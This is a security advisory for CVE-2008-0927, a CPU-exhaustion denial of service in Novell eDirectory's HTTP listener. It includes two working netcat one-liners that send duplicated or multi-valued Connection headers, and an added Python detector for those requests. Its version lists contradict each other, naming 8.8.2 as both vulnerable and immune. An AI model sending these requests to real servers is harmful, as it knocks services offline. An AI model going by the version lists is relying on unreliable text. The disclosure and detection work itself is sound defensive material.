A vulnerability in Novell's eDirectory allows Connection: HTTP headers to be used to cause dhost.exe to consume 100% of a CPU. Multiple submitted requests can consume time on all CPUs.
Credit:
The information has been provided by Nicob.
The original article can be found at: http://www.novell.com/support/viewContent.do?externalId=3829452&sliceId=1
Vulnerable Systems:
* Novell eDirectory version 8.8.2
* Novell eDirectory version 8.7.3.9
Immune Systems:
* Novell eDirectory version 8.7.3 sp10
* Novell eDirectory version 8.8.2
Technical details:
The dhost.exe process will consume 100% of a CPU. More than one request can be used to lock every CPU.
Two "Connection:" headers: (echo "GET / HTTP/1.0"; echo "Connection: foo"; echo "Connection: bar"; echo; echo) | nc -vn 192.168.1.1 8028
One "Connection:" header with two values: (echo "GET / HTTP/1.0"; echo "Connection: foo, bar"; echo; echo) | nc -vn 192.168.1.1 8028
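A defender-side check for the two request shapes described above, as an added example that is not part of the original advisory: it parses a raw HTTP request head and reports whether it carries more than one Connection header line or more than one comma-separated Connection value. The function names and the sample requests are constructed for illustration.

```python
import re

def connection_values(raw: bytes) -> tuple[int, list[str]]:
    """Return (number of Connection header lines, all comma-separated tokens)."""
    # Keep only the request head; accept CRLF or bare LF line endings.
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    # Unfold obsolete continuation lines (they start with a space or tab).
    head = re.sub(rb"\r?\n[ \t]+", b" ", head)
    lines = re.split(rb"\r?\n", head)[1:]  # skip the request line
    count, tokens = 0, []
    for line in lines:
        name, sep, value = line.partition(b":")
        # Header names are case-insensitive.
        if not sep or name.strip().lower() != b"connection":
            continue
        count += 1
        tokens += [t.strip().decode("latin-1") for t in value.split(b",") if t.strip()]
    return count, tokens

def matches_advisory_pattern(raw: bytes) -> bool:
    """True for repeated Connection headers or one header with several values."""
    count, tokens = connection_values(raw)
    return count > 1 or len(tokens) > 1

# Constructed sample requests (not captured traffic).
SAMPLES = {
    "two_headers": b"GET / HTTP/1.0\nConnection: foo\nConnection: bar\n\n\n",
    "two_values": b"GET / HTTP/1.0\nConnection: foo, bar\n\n\n",
    "folded_values": b"GET / HTTP/1.0\r\nCONNECTION: foo,\r\n bar\r\n\r\n",
    "single_value": b"GET / HTTP/1.1\r\nHost: example.invalid\r\nConnection: close\r\n\r\n",
    "no_header": b"GET / HTTP/1.0\r\n\r\n",
}

if __name__ == "__main__":
    for label, request in SAMPLES.items():
        print(f"{label:14} flagged={matches_advisory_pattern(request)}")
```

Multi-valued Connection headers are valid HTTP, so a check like this is only useful scoped to traffic destined for an unpatched eDirectory HTTP listener (port 8028 in the commands above), not as a general-purpose rule.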
CVE Information:
CVE-2008-0927